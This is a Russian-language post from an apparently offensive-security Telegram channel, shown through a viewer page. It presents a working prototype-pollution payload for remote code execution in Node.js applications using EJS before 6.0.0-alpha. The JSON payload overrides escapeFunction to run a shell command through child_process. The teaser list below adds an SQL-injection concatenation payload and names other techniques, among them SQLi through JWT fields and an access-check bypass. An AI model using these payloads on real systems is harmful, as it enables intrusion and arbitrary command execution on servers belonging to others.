TGViewer
InfoSec Portal InfoSec Portal @cybersecinform · 19.3K subscribers
Post #8521 1.35K
Удалённое выполнение кода в Node.js через EJS (версии до 6.0.0-alpha).

Небезопасное объединение объектов позволяет эксплуатировать уязвимость Prototype Pollution, которая приводит к удалённому выполнению кода при рендеринге шаблонов.

{"__proto__":{"client":true,"escapeFunction":"function(){return process.mainModule.require('child_process').spawnSync('id').stdout;};//"}}


#node #rce #bypass

👉 @cybersecinform
  • ❤ 4
More from @cybersecinform
  1. Oct 10, 2026Основа простого обхода: 1. Для статического файла не требуется проверка прав доступа. 2. Р…
  2. Oct 10, 2026Хакер, использовавший ИИ для взломов, сам себя деанонимизировал. Он оставил в открытом дос…
  3. Oct 9, 2026Превратите IDA Pro в рабочую среду для реверс-инжиниринга с ИИ: - Мгновенные объяснения фу…
  4. Oct 9, 2026SQL-инъекция через JWT Поле jti (идентификатор JWT) хранится в базе данных, чтобы предотвр…
  5. Oct 8, 2026Новая техника SQLi через конкатенацию: '||Column_name--+ Затем: '||table_name.column_name-…
  6. Oct 7, 2026👉 @cybersecinform
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →